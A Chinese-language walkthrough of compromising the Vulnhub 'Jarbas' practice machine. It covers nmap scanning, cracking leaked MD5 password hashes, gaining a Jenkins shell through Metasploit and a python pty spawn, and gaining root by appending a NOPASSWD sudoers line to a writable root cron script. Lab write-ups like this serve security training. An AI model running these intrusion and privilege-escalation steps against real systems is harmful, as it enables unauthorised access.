目标:拿到服务器的Shell

信息收集

配置好后用nmap扫描

kali's ip:192.168.241.131
nmap -sP 192.168.241.131/24



一个个扫描

发现192.168.241.2是Vmware的服务,猜测jarbas的IP地址为192.168.241.142

扫描开放的端口

nmap -sV 192.168.241.142

22/tcp   open  ssh     OpenSSH 7.4 (protocol 2.0)
80/tcp open http Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
3306/tcp open mysql MariaDB (unauthorized)
8080/tcp open http Jetty 9.4.z-SNAPSHOT

其中,22/ssh端口有被爆破的风险,可以使用hydra或者是msf的爆破模块

OpenSSH用户枚举CVE-2018-15473

https://www.cnblogs.com/Gh0st1nTheShell/p/14836694.html

3306/mysql

(1)mysq弱口令破解

(2)弱口令登录mysql,上传构造的恶意UDF自定义函数代码,通过调用注册的恶意函数执行系统命令

(3)SQL注入获取数据库敏感信息, load_file()函数读取系统文件,导出恶意代码到指定路径

发现有http服务,选择在浏览器打开



http://192.168.241.142:8080页面



进行目录爆破

80:



access.html

  • tiago:5978a63b4654c73c60fa24f836386d87
  • trindade:f463f63616cb3f1e81ce46b39f882fd5
  • eder:9b38e2b1e8b12f426b0d208a7ab6cb98

    进行md5解密
  • tiago:italia99
  • trindade:marianna
  • eder:vipsu

    用这些账号用ssh登录,发现登陆失败,数据库也不能直接链接被拦截,推测不是用于登录主机和数据库

    8080:



    login:



    用刚才的账号密码登录,发现只有eder:vipsu可以登陆上



    robots.txt

尝试攻击

首先尝试找到Jenkins的漏洞,搜索msf是否存在响应的漏洞



使用第8条



但是运行时报错

set forceexploit true



再运行,返回meterpreter

也可以使用第9条,在输入的参数值中需要管理员的账号密码,就可以用刚才找到的账户密码进行攻击

使用shell命令,返回sh,非常难使用



使用python,创建一个比较好使用的shell(bash)

python -c 'import pty ;pty.spawn("/bin/bash");'



但是权限太低,尝试提权

提权

提权--信息收集

使用定时任务来进行提权

cat /etc/crontab crontab -l



cat /etc/crontab查看定时任务发现一个以root身份定时执行的任务CleaningScript.sh

提权

修改CleaningScript.sh内容,使它能够修改sudoers,给予jenkins免密码执行sudo的权限。并利用crontab定时执行该任务

echo "echo 'jenkins ALL=(ALL) NOPASSWD:ALL' >> /etc/sudoers" >> /etc/script/CleaningScript.sh



等待任务被执行

定时任务提权条件:

1.每隔5分钟删除一次http的访问日志

2.以root用户运行

3.脚本任何用户可编辑

使用指令切换到root权限

sudo /bin/bash

Vulnhub -- Jarbas靶机渗透的更多相关文章

  1. VulnHub CengBox2靶机渗透

    ​本文首发于微信公众号:VulnHub CengBox2靶机渗透,未经授权,禁止转载. 难度评级:☆☆☆☆官网地址:https://download.vulnhub.com/cengbox/CengB ...

  2. Vulnhub DC-1靶机渗透学习

    前言 之前听说过这个叫Vulnhub DC-1的靶机,所以想拿来玩玩学习,结果整个过程都是看着别人的writeup走下来的,学艺不精,不过这个过程也认识到,学会了很多东西. 所以才想写点东西,记录一下 ...

  3. Vulnhub JIS-CTF-VulnUpload靶机渗透

    配置问题解决 参考我的这篇文章https://www.cnblogs.com/A1oe/p/12571032.html更改网卡配置文件进行解决. 信息搜集 找到靶机 nmap -sP 192.168. ...

  4. Vulnhub webdeveloper靶机渗透

    信息搜集 nmap -sP 192.168.146.0/24 #主机发现 nmap -A 192.168.146.148 #综合扫描 访问一下发现是wordpress,wp直接上wpscan wpsc ...

  5. Vulnhub DC-8靶机渗透

    信息搜集 nmap -sP 192.168.146.0/24 #主机发现 nmap -A 192.168.146.146 #Enable OS detection, version detection ...

  6. Vulnhub DC-7靶机渗透

    信息搜集 nmap -sP 192.168.146.0/24 #主机发现 nmap -A 192.168.146.144 #端口扫描 查看robots.txt,看看admin,403,其他没有什么可利 ...

  7. Vulnhub DC-3靶机渗透

    修改错误配置 打开了ova文件会发现,怎么也找不到DC-3的ip地址,估计是网卡出了问题. 那么就先配置下网卡. 进入上面这个页面之前按e. 将这里的ro 替换为 rw signie init=/bi ...

  8. Vulnhub DC-1靶机渗透

    简介 DC-1靶机是为了入门渗透测试的人准备的入门级的靶机,该靶机共有5个flag,其中最后一个finalflag是真的flag,其他都是提示性flag.这个靶机虽然简单,但是还是能学到一些基本的思路 ...

  9. Vulnhub bulldog靶机渗透

    配置 VM运行kali,桥接模式设置virtualbox. vbox运行靶机,host-only网络. 信息搜集 nmap -sP 192.168.56.0/24 或者 arp-scan -l #主机 ...

随机推荐

  1. liunx:网络命令

    现系统的学习一下Web渗透相关的命令 ping ping 命令是用来测试TCP/IP 网络是否畅通或者测试网络连接速度的命令,对确定网络是否正确连接,以及网络连接的状况十分有用.简单的说,ping就是 ...

  2. 【NX二次开发】Block UI 表达式

    属性说明 常规         类型 描述     BlockID     String 控件ID     Enable     Logical 是否可操作     Group     Logical ...

  3. 【NX二次开发】Block UI 角度尺寸

    属性说明 常规         类型 描述     BlockID     String 控件ID     Enable     Logical 是否可操作     Group     Logical ...

  4. 【题解】入阵曲 luogu3941 前缀和 压维

    丹青千秋酿,一醉解愁肠. 无悔少年枉,只愿壮志狂 题目 题目描述 小 F 很喜欢数学,但是到了高中以后数学总是考不好. 有一天,他在数学课上发起了呆:他想起了过去的一年.一年前,当他初识算法竞赛的 时 ...

  5. .NET解密得到UnionID

    由于微信没有提供.NET的解码示例代码,自己搜索写了一个,下面的代码是可用的 var decryptBytes = Convert.FromBase64String(encrypdata); var ...

  6. Java实现单例模式的几种方式

    单例模式(Singleton),保证在程序运行期间,内存中只有一个实例对象. 饿汉式,最常用的方式.JVM加载类到内存中时,创建实例,线程安全. public class Boss { private ...

  7. 27、路由 route

    优先于网卡中的配置,但是重启或重启网卡失效,最好加入到开机自启动服务中/etc/rc.local文件中: 27.1.添加网络路由: 目的网络.目的网络掩码,网关.网卡: 网络寻址以路由表中的路由优先: ...

  8. Elasticsearch的配置学习笔记

    文/朱季谦 Elasticsearch是一个基于Lucene的搜索服务器.它提供一个分布式多用户能力的全文搜索引擎,基于RESTful web接口,Elasticsearch是用Java语言开发的. ...

  9. oracle 日常运维

    1.查询表或存储过程.函数异常 select * from user_errors where name ='TEST_TABLE' 2.查询表是否存在 select * from user_tabl ...

  10. Retrofit使用Kotlin协程发送请求

    Retrofit2.6开始增加了对Kotlin协程的支持,可以通过suspend函数进行异步调用.本文简单介绍一下Retrofit中协程的使用 导入依赖 app的build文件中加入: impleme ...